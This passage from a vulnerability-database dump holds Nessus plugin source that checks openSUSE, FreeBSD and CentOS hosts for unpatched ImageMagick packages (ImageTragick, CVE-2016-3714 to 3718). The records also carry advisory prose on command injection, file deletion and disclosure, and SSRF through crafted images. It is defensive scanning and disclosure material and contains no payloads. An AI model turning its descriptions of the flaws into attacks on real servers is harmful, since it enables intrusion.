using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ImageMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ImageMagick-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-6_Q16-3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagick++-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickCore-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libMagickWand-6_Q16-1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-PerlMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-debugsource-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ImageMagick-extra-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-6_Q16-3-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagick++-devel-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickCore-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libMagickWand-6_Q16-1-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-PerlMagick-debuginfo-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"ImageMagick-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-6_Q16-3-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagick++-devel-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-32bit-6.8.8.1-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libMagickWand-6_Q16-1-debuginfo-32bit-6.8.8.1-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-debuginfo / ImageMagick-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:51", "description": "Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats. Any service which uses ImageMagick to process user-supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any folder by using ImageMagick's 'msl' pseudo protocol. msl.txt and image.gif should exist in known location - /tmp/ for PoC (in real life it may be web service written in PHP, which allows to upload raw txt files and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using ImageMagick's 'label' pseudo protocol.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "type": "nessus", "title": "FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ImageMagick", "p-cpe:/a:freebsd:freebsd:ImageMagick-nox11", "p-cpe:/a:freebsd:freebsd:ImageMagick7", "p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "href": "https://www.tenable.com/plugins/nessus/90979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90979);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.\"\n );\n # http://www.openwall.com/lists/oss-security/2016/05/03/18\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2016/05/03/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://imagetragick.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fafa51e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick-nox11<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7-nox11>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:08", "description": "An update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:centos:centos:ImageMagick", "p-cpe:/a:centos:centos:imagemagick-c%2b%2b", "p-cpe:/a:centos:centos:imagemagick-c%2b%2b-devel", "p-cpe:/a:centos:centos:ImageMagick-devel", "p-cpe:/a:centos:centos:ImageMagick-doc", "p-cpe:/a:centos:centos:ImageMagick-perl", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# CentOS Errata and Security Advisory 2016:0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91020);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"CentOS 6 / 7 : ImageMagick (CESA-2016:0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021865.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d280230\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-May/021866.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eefa6faa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:56:47", "description": "From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the 